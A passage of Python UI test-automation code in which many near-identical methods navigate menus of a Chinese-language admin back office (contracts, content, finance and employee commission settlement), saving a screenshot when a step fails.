mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Transfer_remittance_examine(self):
"""
转账汇款审核
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "转账汇款审核")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transfer_remittance_examine(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_progress_view(self):
"""
项目进展查看
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "项目进展查看")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_progress_view(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_liquidation(self):
"""
项目清算管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "项目清算管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_liquidation(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_investment_Income_record(self):
"""
跟投收益记录
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "跟投收益记录")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.investment_Income_record(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 内容中心 -- 内容配置
def get_link_Homepage_Bullet_Window(self):
"""
首页弹窗管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "首页弹窗管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Homepage_Bullet_Window(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Poster_Configuration(self):
"""
海报配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "海报配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Poster_Configuration(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Live_Course_Management(self):
"""
直播课程管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "直播课程管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Live_Course_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Announcement_config(self):
"""
管家端公告配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "管家端公告配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Announcement_config(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Flash_screen_advertising(self):
"""
闪屏广告
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "闪屏广告")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Flash_screen_advertising(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 内容中心 -- 资讯反馈
def get_link_Topic_Page_Management(self):
"""
专题页配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "专题页配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Topic_Page_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 交易中心 -- 客户管理
def get_link_Customer_List(self):
"""
客户列表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("交易中心", "客户列表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Customer_List(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 交易中心 -- 用户管理
def get_link_User_List(self):
"""
用户列表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("交易中心", "用户列表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.User_List(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 支付板块
def get_link_Transfer_accounts_examine(self):
"""
转账审核
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "转账审核")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transfer_accounts_examine(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 业绩管理
def get_link_Transaction_commission(self):
"""
交易及佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "交易及佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_confirmation(self):
"""
回款确认
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "回款确认")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_confirmation(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 佣金审核
def get_link_Broker_rewards(self):
"""
经纪人奖励
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪人奖励")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_rewards(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Broker_Commission(self):
"""
经纪人结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪人结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Broker_company_Commission(self):
"""
经纪公司结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪公司结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_company_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_network_pusher_Commission(self):
"""
网络推客结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "网络推客结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.network_pusher_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 奖励管理
def get_link_shop_card_Commission(self):
"""
购物卡结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_category(self):
"""
购物卡类别
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡类别")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_category(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_Stock(self):
"""
购物卡库存
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡库存")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_Stock(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_query(self):
"""
购物卡查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_send(self):
"""
购物卡发货
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡发货")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_send(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 返还支出
def get_link_Refund_inquiry(self):
"""
返还款查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "返还款查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Refund_inquiry(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Refund_payment(self):
"""
返还款支付
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "返还款支付")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Refund_payment(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 团奖结算
def get_link_Group_award_statement(self):
"""
团奖结算表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖结算表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_statement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Group_award_application(self):
"""
团奖申请
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖申请")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_application(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Group_award_Finance(self):
"""
团奖申请-财务
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖申请-财务")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_Finance(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 结算支付
def get_link_List_pending_payments(self):
"""
待支付清单
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "待支付清单")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.List_pending_payments(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_List_Query(self):
"""
支付清单查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "支付清单查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_List_Query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Settlement_Inquiry(self):
"""
结算查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "结算查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Settlement_Inquiry(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_settings(self):
"""
支付设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "支付设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_settings(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 分佣设置
def get_link_Cooperative_Label_Management(self):
"""
合作标签管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "合作标签管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Cooperative_Label_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Commission_management(self):
"""
项目分佣管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目分佣管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Commission_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Level_Management(self):
"""
项目等级管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目等级管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Level_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Commission_Detail(self):
"""
项目分佣比例明细
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目分佣比例明细")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Commission_Detail(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 员工管理
def get_link_Departmental_management(self):
"""
部门管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "部门管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Departmental_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Business_Line_Management(self):
"""
业务线管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "业务线管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Business_Line_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Post_management(self):
"""
岗位管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "岗位管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Post_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_management(self):
"""
员工管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 结算标准
def get_link_Section_standard_setting(self):
"""
区间标准设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "区间标准设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Section_standard_setting(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Transaction_settlement_standard(self):
"""
成交结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "成交结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_settlement_standard(self):
"""
营收结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_settlement_standard(self):
"""
利润结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_standard_setting(self):
"""
利润标准设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润标准设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_standard_setting(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_settlement_standard(self):
"""
市场结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 计提标准
def get_link_commission_standard(self):
"""
交易佣金标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "交易佣金标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.commission_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Performance_incentive(self):
"""
业绩激励标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "业绩激励标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Performance_incentive(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_incentive(self):
"""
利润激励标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润激励标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_incentive(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Commission_Standard(self):
"""
市场佣金标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场佣金标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Commission_Standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 业绩结算
def get_link_Transaction_Settlement(self):
"""
成交结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "成交结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_Settlement_Month(self):
"""
营收结算-月
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算-月")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_Settlement_Month(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_Settlement_Year(self):
"""
营收结算-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_Settlement_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_Settlement(self):
"""
利润结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Settlement(self):
"""
市场结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 内部激励
def get_link_employee_Commission_Summary(self):
"""
员工佣金发放总表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工佣金发放总表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.employee_Commission_Summary(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Commission(self):
"""
市场佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Trading_Commission(self):
"""
交易佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "交易佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Trading_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_motivation_Month(self):
"""
员工激励-月
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工激励-月")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_motivation_Month(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_motivation_Year(self):
"""
员工激励-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工激励-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_motivation_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
